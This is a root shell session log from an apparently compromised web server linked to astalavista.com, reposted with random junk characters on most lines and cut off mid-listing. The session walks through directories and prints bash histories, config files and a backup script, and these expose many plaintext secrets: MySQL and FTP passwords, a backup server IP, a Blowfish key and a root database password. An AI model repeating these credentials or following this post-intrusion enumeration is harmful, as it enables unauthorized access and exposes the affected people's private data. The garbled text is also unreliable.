#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #( x; [8 k7 ?" e4 H( L5 F
# |__| [__ | |__| | |__| | | | [__ | |__| #9 Z4 C F5 J* Y9 B
# | | ___] | | | |___ | | \/ | ___] | | | #
* ?$ X" X: P/ b2 o) c) X, e# M% M# #- a: I& x! Q1 j1 v
#####################################################" a- d( M! D5 N( a1 _2 v$ ~, Q- A
# #4 H8 d& B; B6 @, N4 e, e
# Admin Contact - 链接标记support@secureservertech.com #. K% A( Q9 T+ a$ {8 x d& A2 @7 p1 Z
# #
/ r$ c) q& g. y+ F; s# Available ShortCuts #
/ a$ t6 W( l5 h4 G6 K/ h# #
+ B! A7 T( E4 l0 a! P0 c8 @9 T1 W, ^ |* o# nst - list active connections #! J4 D$ Z& w' A
# ddos - shows how many times each ip is connected #0 L" D9 T4 F% M {/ s2 d' q* U
# ltr - restart the webserver #1 A4 [% X0 P, p. Y
# phpc - edit the php config file #
: q% u) A, k# L# htc - edit the webserver configuration file #
' } e5 ]' H, g9 I& v# up - uptime #
# c2 @: K; A9 B, a# etd - edit the motd of the day file #- v6 G) k l7 v3 j( o
# htr - start and restart apache if needed #
# C$ m+ C3 ?8 k/ s0 J# syng - shows active SYN_RECV connections #
) t; j: k# W2 k% D) { y1 x# synd - syn flood blocker - “synd -h” for usage #
" g, |- Z% l! n* v+ O1 ^8 A#####################################################
/ F3 x" u/ l2 G- m# q# NOTES: #
5 o' c, F' k( Q9 }/ F; P* g+ \# Last Upgrade - 12-08-2008 by JF #$ @- Y" `9 ?. V3 I
# My.cnf/Mysql Optimization - 1-28-09 #6 e( w) f- B- w1 ?0 z+ G- W! C
# #
- d; ]# J/ B+ \5 N# Y; R6 Z# #
- T, {3 C6 J1 W3 u4 o8 A! o( @# #
' h( e8 ~7 Z/ ^4 d6 n#####################################################
" {1 ^# m: p2 t' Q2 y# s: `2 Y0 |( {- `4 a3 V3 U, D
sh-3.2# lastlog | grep -v Never1 B2 b( P4 X& L" Z+ y X
Username Port From Latest4 c8 ]+ M, o1 M1 w9 O) T/ q' r
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
: [8 X) A% l; C0 {0 ~) Fadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008$ _+ f) w6 X, D3 J6 n1 P! s7 j
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20096 k! }) a6 G; O' ?& P2 r4 S7 \
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009; j3 t( J: z. @. H
7 N+ U, L3 j& @$ o9 qsh-3.2# ls -la+ @( ?$ _2 s$ Q+ u
total 453376; M4 q. @ j# |9 L# Q4 [
drwxr-x— 15 root root 4096 Jun 4 08:40 .
3 Z9 S4 {' p- Mdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..4 C1 J8 K) t9 i" G7 S1 \
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip6 Q4 ]5 N3 S9 ?. @
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg1 w# j; C. H- j3 ~/ F
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history, j' V) C; U8 O% \
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
% r" s8 f) R3 I; g2 H/ R: s-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
1 ~# L) ~1 Q+ w, \$ s) P-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
& D* {- v3 [" `8 ~; ^; x-rwx—— 1 root root 1899 Oct 28 2007 bk.sh7 V: f! w, p! \- g' A
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
* s+ f! J) a8 \$ f3 w) T1 f4 ]0 _% L-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql. e5 k0 @0 e% R. y/ W
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
" u# e( r' I( r) ]. M-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc2 D: n; c i# A* p2 h3 \) k7 n: t
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
}' ^, D: L* \drwx—— 2 root root 4096 Oct 28 2007 .elinks9 G3 |5 T3 }& S; z
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
5 j$ Z. o. M& r9 n) _; c-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2+ `! ^, x' L& c8 B% R% R3 p5 k8 S+ q
-rw——- 1 root root 0 Apr 16 13:19 .history; R$ l6 p& Q0 n) n* @! y
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log6 ]" V) O$ H" _- c1 I( R
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
4 L' W, O& h7 _9 c-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh% k2 i6 w9 Z, i$ w$ X
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
0 m; V/ c: _) I& ?drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp5 Y2 M9 a4 O" X, Z2 k& l1 X
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
- y B( N* S0 L# X9 G-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz# Z. J6 k8 U, e$ D
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz27 Q6 c' j7 x" B6 J. T& H
-rwx—— 1 root root 760 Sep 18 2008 lp+ H! i9 d2 }; v% i8 B1 J% H: ^' T6 V
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
5 i" y. I, R1 K' F! P) n1 I-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
, V( |. [5 Y. _1 K3 r* I-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
" K# P8 K2 w# H V5 V) k0 e s( Kdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9+ _, A) A2 j6 ?
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz: u# j( y" e. W
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3+ [, B9 q6 _2 \% a z7 x) n
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz1 j) l6 x) p5 k& E* V( ~
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
2 E* b5 C( t+ H-rw——- 1 root root 41 Oct 19 2007 .my.cnf. A) c' J2 H- \) y
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
8 g6 |: f& G2 f: j i0 n-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
- H0 G$ D$ s5 Z% X9 l6 y-rw——- 1 root root 41 May 20 2008 .mytop8 [- Y* I" V l, o
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6/ e) C$ S8 ^2 T9 \, g- I" V7 M3 j& j
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
8 }- W& w' F- m; i, ydrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp' Y. i2 o9 A; t: ~% A. i) Y
-rw——- 1 root root 1462 Sep 21 2007 opt.php- ~9 A2 B- A% |+ n/ H4 ?
-rw-r–r– 1 root root 3371 Sep 22 2007 p
9 \9 |4 }5 o' y' O4 ~0 H& B-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
6 P" M( U. X1 n- J-rw——- 1 root root 1024 Feb 3 21:32 .rnd+ ` {" U2 t5 Z% h* n
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr) G: e; A6 W; | ]# K
-rw-r–r– 1 root root 887 Nov 28 2007 server.key, Y& z! Z, R2 M5 y$ S$ p
drwx—— 2 root root 4096 Oct 10 2008 .ssh
! P2 O& f4 `, L0 W' t-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat9 h# p+ P6 j2 V) X' {3 e/ K
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
0 n1 D9 \% v }: a$ B: S0 Q4 X* |-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip% C6 r' h2 Q( A( Z3 w& E
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
# j4 h* U: _, b: m7 `6 u4 o5 L0 ldrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
/ C; s3 l J3 l7 ~6 c-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
: o6 s4 Y; z, y: A5 x. ldrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0, y8 W i8 Y' l& ]0 e
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz29 W/ [4 G8 I3 x& Q' |" ]
-rw——- 1 root root 12997 May 16 2008 .viminfo/ ?4 x6 T) e! s+ Y8 ~
: Z! D- O X! r3 j C/ T1 H
sh-3.2# cat .bash_history
/ T. k( m9 R/ T; t[snip]
! S! a- X+ r5 j& f% K/ z5 j6 H& kwget cp4sst.com/sstlinux.tar.gz f3 c5 }' o5 S, n; Y; Z
tar zxvf sstlinux.tar.gz: B/ Z: u4 g$ n6 l6 w& I
cd linux-2.6.27.10
* F: |& G6 T$ y0 y: Ssh install.sh# a6 O0 [: i% d* C2 `7 Z
make bzImage ; make modules ; make modules_install ; make install: w+ S& L( e* ~1 m
make clean1 y1 g* [( l! ^$ O& E+ p% B
service mysqld restart& ~: T4 E) X( W& L4 w
[snip]
6 _. I! z. `# w! x8 ucd /usr/sbin/
" h7 {9 z+ p2 S# r5 o9 xchmod 4777 traceroute9 ]1 U5 D. q2 h$ ~: W8 r1 N
chmod 4777 ping
6 B: R! Z+ n% I" btraceroute -I 链接标记[url]www.astalavista.ch[/url]+ T& w3 |8 Z R7 b: f; \
[snip]* P- f$ T1 R! M ~
vi /etc/csf/csf.conf
. q: k W1 \9 h" z% N$ Ktraceroute google.ch. B) \* ^/ s3 G9 P( K
service csf restart, x8 B, x+ n- l- d1 \. W2 ?
tracert google.ch
( u5 R- E' G. h: O# @service csf restart
# M1 v0 l: {! C- Straceroute 链接标记[url]www.google.ch[/url]
& J; B* r, @% btracert 链接标记[url]www.google.ch[/url]7 T1 v" ^( s; i/ [
traceroute 链接标记[url]www.google.ch[/url]
* [8 H: U# u6 s- J: q ?; l: Hlocate traceroute
9 `4 t/ o' L! r5 C: a8 R% Gchown 4755 /bin/traceroute
( l2 U) \1 Y- T0 P# Q$ ?' Pchown 4777 /bin/traceroute1 n: w& w# w. G: ^- ^
locate ping' Z6 m8 G6 Z0 C& q$ d0 i3 H
chown 4755 /bin/ping( a0 @* B& d0 L' o3 h. D3 Z0 e
chown 4777 /bin/ping
7 ~' Q7 d+ n- d) q) Xcd /bin/. p7 z2 q6 x4 c! D, H: i0 ~
ls -ali | grep ping
/ |1 Y& H6 ~9 \$ zchown root ping
, g* s' ~2 h# R# ^% ^5 Ichmod 4755 ping* Q V9 y& M3 A7 A' h5 K
ls -ali | grep traceroute
! K4 k% q5 K: c4 W0 X% `5 i9 r, dchown root traceroute
3 L/ {9 }( m! C0 ?, n+ z. o$ \chmod 4755 traceroute
4 V- {9 V; N& Q1 |6 @% wls -ali | grep traceroute* w! o4 s: k7 a8 y" z
traceroute -I 链接标记[url]www.google.ch[/url]& L; z6 I. E: E( _! F! d$ q
traceroute 链接标记[url]www.google.ch[/url]
1 n% u% y+ R9 T) w8 \# F9 zwhois pmsantos.ch, E6 K9 T' u) E+ t6 U% I$ D
[snip]
# r( A& w5 m: g" Q. zmysql -h com_contrexx2_live < /root/defaultp_ports.sql# Q+ T9 R5 p) p. {
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
5 E+ A1 n; N5 Q: E" o/ Zmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
' t- t1 S" S% g. N: G! X5 Ymysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql- v- m. z2 H$ N, a9 q: s8 _' h
top
- O! ~# P8 g4 oping ssth.ch- b' t$ R: H5 N) V4 P
ping asdlkfaljgasd???ljg???lasj.ch
3 U3 |! V6 c4 _- Q7 ~ping asdlkfaljgasdlasj.ch' r) z; _- Q1 G" L: S' F
ping 链接标记[url]www.ssth.ch[/url]
, L$ T% [* U1 |+ J* I* n% eping ssth.ch
9 {, G+ o5 E; l7 anslookup 链接标记[url]www.google.ch[/url]2 P2 @( c3 I; ?) a
nslookup 链接标记[url]www.ssth.ch[/url]
# X$ A' j# T8 nman nslookup, ]# X; K/ _0 A0 b" l: m; p; @
ping 链接标记[url]www.google.ch[/url]
# l2 p0 v* e6 `# ^3 Q) ]- b2 u; enslookup 链接标记[url]www.google.ch[/url]
8 j/ L6 ^( i; v; lnslookup 链接标记[url]www.google.ch[/url]
* w, ~8 Y a# ^nslookup salfjasdlf.ch
6 D5 |" X+ n* I9 j9 t) L6 R[snip]
# [! X4 }9 g, `openssl passwd -1 sadf$ C) O; \" z2 u4 {) m$ y5 z# ~
openssl passwd -1 5cZNHstdTy: h. Y" x7 I) d
mysql
' ~9 v+ D0 r" f; A: imysql
* }- Y; n( |6 R( P- [- Ulocate proftp
6 M i/ B, z! u! Y/ U, n2 \vi /etc/proftpd.passwd
: U4 ?# U2 w9 \2 t7 }% t z( Vservice proftpd restart- B/ h" r! C/ }9 T
locate proftpd.conf
" U* _. @3 T9 Y9 ^vi /etc/proftpd.conf; E/ E' w9 e7 ?& g( I6 d& `
vi /etc/proftpd.passwd! Q- o/ r) [0 r- h" I1 J) k- n7 K
service proftpd restart
7 f @ {( u2 f3 N; i! d[snip]- w9 i$ {/ x# U0 l; m; I* E
/bin/sh /home/com/backup_system/backup.sh; C7 f. n" c' u1 d$ M Y
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin1 r+ {9 t' p. b7 @) j
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
! ^; |1 F+ _2 i/ jmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
* N: s: ], h% p- }ls -ali/ j% d# ~, Z* R/ C, O G
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql6 B- w% ` x4 p4 j: q- }7 j
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
: u7 B7 o. R: F; Y8 Ycrontab -l1 Q, C( I, v( I ^% w0 s7 r
crontab -l
- b$ b7 o, v, R8 @php -q /home/com/public_html/modifications/cronjobs/securitynews.php
! }7 d! _& I& N& I( f/home/com/public_html/modifications/cronjobs/exploits.sh e: z; W! ~' _' M
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
! Q' G C' ^$ |$ ltar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz# d8 y4 W8 T0 m, X$ `4 t
cd lsws-4.0.3 }( C8 h& z( [# V9 \1 A5 _
sh install.sh: j. W: ?2 t/ [# y6 b
uptime7 X: ^" r% \. ^9 ]1 @
hdparm -tt /dev/sda
8 Y: `8 H' n4 }, g0 m, ]3 Tiostat
) J5 y W, V2 M- U! D- Byum install iostat3 i, K/ d* c6 s! O; }1 B1 S( U
iostat
0 N1 d/ a9 M4 i- z1 C e7 pwhereis iostat
2 s+ o; ]) x& [5 o8 I* \4 Z, e; D: [yjm clean all( Y. O p: Y# n* A+ Q
yum clean all ; yum -y update
) h' [, q5 e2 x1 T6 tiostat
0 y. D- a5 B# b Wyum install systat1 L" v: E7 H6 d1 g0 q
rpm -qa | grep iostat2 A# A, ~& P% n6 |8 j, w: ~1 z
rpm -qa | grep sysstat
. J! a' R( f g9 {: A1 [, drpm -qa | grep systat0 P& Q0 Q% {5 f& a/ ^ W6 s% E
dmesg -c+ H5 {1 R, K5 C! S
sysctl -p
- n9 J4 ~2 o4 H9 \) Funame -r9 k2 J% ]7 d( ]4 E
cd /usr/src- r9 p7 e. {4 b, \, o, z
wget nix101.com/kernels/sstlinux.tar.gz, z/ J9 a# r: d/ e+ M% @' V
shutdown -r now
' j$ _7 Y9 v% f# P0 m) e! Vnano -w /boot/grub/grub.conf
6 n8 Y# w9 c' Q2 a3 K
3 h- ^6 r |# B8 Z1 g6 ?sh-3.2# cat .my.cnf
% g e3 y8 d" P2 v[client]2 r, A! Z' S4 g) n8 I
user=da_admin) l: ~" g4 v# m' w+ X( H' m
password=X9dctmRH
3 q, |8 `" P0 H, Y9 ]% ^. ?4 q8 x+ F* N* g }
sh-3.2# cat /home/com/backup_system/backup.sh# K, Y1 U6 @4 l0 \ |9 M/ b
#!/bin/sh
% d" U, ]& M, a' J+ N#####################################################################
6 A# N; [7 I2 G8 x# #
D8 d" l; F" U, q0 C% L1 m# incremental backup for astalavista.com #
" V2 q) ^: z& X# #/ O* y# t ?! @1 j* y6 t1 m0 V
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
4 p8 a5 P/ |- T2 r# #
2 d: O% k+ |( G, W G. }7 ~2 E- D. _; e#####################################################################: u) Q6 B7 g! a: {/ o
[snip]
4 ?+ I4 f; L# r9 H* J; v1 aPROG_DIR=”/home/com/backup_system”;. g$ ^3 a; W( j8 k
BACKUP_DIR=”/home/com/backups”;
1 W! l1 a, u; T( M6 Z0 Y2 D% gDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
% I' o8 a) L7 j3 C, Y6 A4 x7 x# ftp for synology backup server
# r% V4 @% b Y+ c, jFTP_HOST=”212.254.194.163″;
$ x# q" I& g- H* t7 C( {5 SFTP_PORT=”21″;
1 H) a* W9 M* h; Y, dFTP_USER=”astalavista.com”;5 C5 Z6 F% i9 b: i7 E
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
6 l# a; Y- `" k3 v" N' {FTP_DIR=”/astalavista.com”;
/ @& s& G0 N- O: \9 _1 Z2 f# g7 Z# database. H+ w1 Q0 _; d" A; z' O6 }) a
DB_HOST=”localhost”;" T% S- F. l4 z! O9 a$ K
DB_USER=”contrexxuser2″;
2 n# R* ?. W/ _1 ^DB_PASS=”0fEYNZgXz1pKe”;
; L7 _2 G+ Q4 C7 a. V6 gDB_DATABASE1=”com_contrexx2_live”;
s5 D3 {7 ~# q5 R! \$ p. w) JDB_DATABASE2=”com_contrexx2″;
8 S( |, X# Q! A. X! [( y[snip]
+ [3 \3 U" H$ i- Eftp -in $FTP_HOST $FTP_PORT <<EOF
! _3 ]2 g$ e6 c6 ~0 nquote USER $FTP_USER4 I% Y+ @' ]9 v$ v, m/ r
quote PASS $FTP_PASS
! H& t- _: p U$ Z3 T) [cd $FTP_DIR
P, Z% D- ~" G( x2 D4 @; p4 K6 pput $DB_FULLNAME-SQL_Dump.tar. k G, a" u% t: N& f8 Z% v
put $BACKUP_FULLNAME-Public_HTML.tar* E% c+ x8 J2 j; l
close
% \, w* ~( u- {, f% V T9 W+ hbye. s: A! E4 M. P8 u' I5 D$ F' h* b
EOF D* Z/ e9 W4 K' [% O
$ h1 ]: [$ d, W3 osh-3.2# cd /home
2 g2 n0 P" u2 S* |( Csh-3.2# ls -la. M1 B. k6 F+ g( v. r, N
total 120; |6 _ X1 P! d( l# T# C$ F$ m
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
; \' [* A* x+ M3 Ddrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
/ h$ N+ O) z) T* D) [3 x8 Q4 hdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin; U- K$ p4 F) p- ]% n- D5 ~
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group, v$ w# L \# p/ O7 P" e; g% C1 Q. m. _
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
& Z, }# X( c/ _( g% e# d" ^drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
q0 [ \; T9 | k6 ydrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
( Y% k5 f% N& k- Adrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
4 Z( e- P& O+ adrwx–x–x 10 com com 4096 Apr 28 12:40 com/ c( x2 ~4 U- F! y8 j
drwxr-xr-x 2 root root 4096 May 17 2007 ftp; R1 w$ K' ~6 P( ?# l
drwx—— 3 jon jon 4096 Sep 21 2007 jon h! Z, \$ l. b+ t4 G+ `
drwx—— 2 root root 16384 Sep 11 2007 lost+found; |, Y0 Z9 d( E+ q4 |$ q4 F
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
: U4 j& N: g* {9 F) z5 @% I% wdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
* P& {, m# W6 {drwx—— 2 jon jon 4096 Sep 15 2007 test# O0 V8 D. M5 H
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
6 T7 o5 {- h8 n* I5 h/ N' L
- N9 S" J! ]5 e7 H I1 E# c4 tsh-3.2# cd admin% x- ]$ Q/ h/ m2 S. T
sh-3.2# ls -la! \6 R' X& W/ a+ ]( M* @
total 1735896
* f' y3 Q C, b# D6 W/ e- Ndrwx–x–x 9 admin admin 4096 Nov 28 2007 .
! T$ p% |8 {. d4 ldrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, C/ u, u4 x3 B Adrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
- g* R: z- a0 y8 tdrwx—— 2 admin admin 4096 Sep 28 2007 backups
* S* H* n. W' X/ r: X$ z-rw——- 1 admin admin 860 Sep 17 2008 .bash_history+ Y* j4 M {9 v+ [
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout e5 \3 `( g6 H M7 ~$ O2 u u7 U
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
" S. g0 K( S: `8 D-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc' X: x. M# E: T. n" G, Q
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
/ K, `6 W. J, S. p, [$ ~drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
' K# |( J) I9 \( tdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
* Z5 n/ b' f" Y5 ]-rw-r–r– 1 root root 24 Sep 21 2007 info.php& _" K+ Z: g6 P; Y \
drwx—— 2 admin admin 4096 Sep 21 2007 mail4 n- U( f. y/ J
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
+ |6 G: ^9 G: l! {- \-rw-r–r– 1 root root 887 Nov 28 2007 server.key
9 \. {/ r6 S2 x% i6 w-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
. K0 {2 |. t) B. A" f- Q-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
, F4 F* `$ C' f9 j9 }- ]drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
0 F3 P1 X( c3 C' s. b* w6 b7 L
0 |; W; A. @9 qsh-3.2# ..$ Y+ V; x, j8 `# E6 E
sh-3.2# cd jon
6 h/ @. R* m9 ^0 `1 J6 Fsh-3.2# ls -la9 u- R* z/ u" O
total 36# Z+ I8 A& R$ g# U
drwx—— 3 jon jon 4096 Sep 21 2007 .! r. P, l) x0 E- @, v$ [" i; j" O
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 m+ ?9 b& M2 n* T
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history" p% G& F: N0 H* p
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
8 @' t3 n7 o* u/ Z-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
& | W2 @9 T; y; C% [0 m9 y" R. b4 v-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc4 v, O( n v7 N& V; X: g+ ~7 Z# m
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
) G5 ^3 n* e& \$ Q i5 s6 a, Q: Xdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
3 d% X' Y* `( `# g& R
" M) ^4 ]1 p2 u, J/ ?% n1 tsh-3.2# cd ..4 E. K8 Y, s: f4 O. n5 X
sh-3.2# cd test
4 V9 k7 q7 @ m' f) \sh-3.2# ls -la" r/ h, C- F& Z* ]" Y% D
total 48
% W' J' a) Y- ~drwx—— 2 jon jon 4096 Sep 15 2007 .
, d0 ^: n( | T9 t n9 F+ a$ G4 Ddrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
2 s; I% d) w$ N, ^-rw——- 1 jon jon 79 Sep 21 2007 .bash_history" D- F" P/ ?% m8 o6 v
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout; \/ n: E/ b+ K
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile/ O4 v/ z, S% n. C3 a
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
* b8 b5 _# @& i1 ]" Nsh-3.2# cat .bash_history- I( [, q; ?: l+ W
/usr/bin/mysqladmin -u root password PoliuJhytg671 `: r6 Q$ T' P M; w& S. s
+ ]: n6 }( d2 r& lsh-3.2# cd ..
) u) M! W: l0 z7 G% Osh-3.2# cd astanet
9 ]6 x' n' f. e0 h" hsh-3.2# ls -la
/ M, _7 }3 U$ p- Qtotal 52
! v! }* `/ T7 L: s- i+ v0 adrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .) U. m8 I) i5 l, e) V( a4 f& \1 ]0 s
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 r/ s- H$ r& g/ l8 m' M/ |drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth( r1 d$ S: r( W; s s
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
5 l6 H/ X# V5 U5 s; E' @-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
9 q1 V) ?6 Z5 T7 ]: ~-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile" N: @1 N3 M% b2 R
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc9 O; l- Q. g% C1 G% T. @
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
. s. N( |2 V/ s& E$ fdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
7 R3 E9 [/ h; H* ]: k+ B+ ^) a0 ydrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail8 h' E- r1 p6 V" l5 V* q7 ~& I: b3 e I
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
9 l: G0 ?: k( s# Z9 a9 a" g2 Xlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
3 _8 A v, H) }- u-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
7 S+ m8 t/ C0 G, C( |
& c- T( A4 |9 W0 b, Y9 y* H7 \8 o- rsh-3.2# cd auth/. i' c. f9 m( e- j0 j* D8 Q
sh-3.2# ls -la
8 t- \) _# y& C: [) L0 ~total 28& u) E3 k: p; b, [& w/ i! A
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
0 c) W' r: d% `9 m$ l9 I- ?drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..; _ G' \, a7 p* @' E- q; h
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php* k4 j+ d, [3 C6 P$ P; L) X
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
* V: j+ v8 @6 n9 {-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd z# i) y: d* r% k- n
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
; P7 \2 G _/ E3 R% a7 i) ^-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd0 g& D9 [, Y. {4 s
: w/ ]( ~2 h% I4 d# {( tsh-3.2# cat hackercontest.config.inc.php0 n0 T# x2 Y8 R+ }+ E( s+ p
<?PHP" e$ k ?( F* j: v
// Variabeln f?r Verbindung zur Datenbank //. I2 J9 w& [" a4 z8 E$ H
$conxHost = ‘localhost’; // MySQL hostname. q ?0 B+ X1 Z
$conxUser = ‘hackercontest’; // MySQL user- f; w# j% N- k5 Z) k8 n. s
$conxPassword = ‘K6m@7dUc’; // MySQL password
) H2 v; m) j* C5 d G% y+ y$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish: E/ j) g1 p! e7 A. F- M
?>* c. R K3 M6 @3 ^: F
sh-3.2# cat hosting.config.inc.php& v- `9 @0 P4 g* l [$ }
<?PHP# F2 u: t. E: S) ? ?
// Variabeln f?r Verbindung zur Datenbank //
p, ?( B" ~- F$conxHost = ‘localhost’; // MySQL hostname1 e- K' H" T( i
$conxUser = ‘hostinguser’; // MySQL user* P7 W9 W' g1 ^( U8 u
$conxPassword = ‘cXvB3981′; // MySQL password' y& ~+ B2 j: M0 b. H
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
; t" B' p" d2 f5 k; b% ?2 l) t% T8 I?> S. E8 s( z5 W# L2 ~8 l
+ o* q+ d) s* t, K2 Q' ^: Ysh-3.2# cd ..1 i: ^$ ]5 j" m$ Y& N( W" ]) s! R
sh-3.2# cd com
t2 \- e5 _6 g" `sh-3.2# ls -la4 U! g0 g! T4 f, J2 ]5 K
total 1412083 G9 Z5 J* q! n/ W# a+ a5 ]6 c" a
drwx–x–x 10 com com 4096 Apr 28 12:40 .
$ {! Q" X- ~; Zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..$ u. e3 ` h# W L
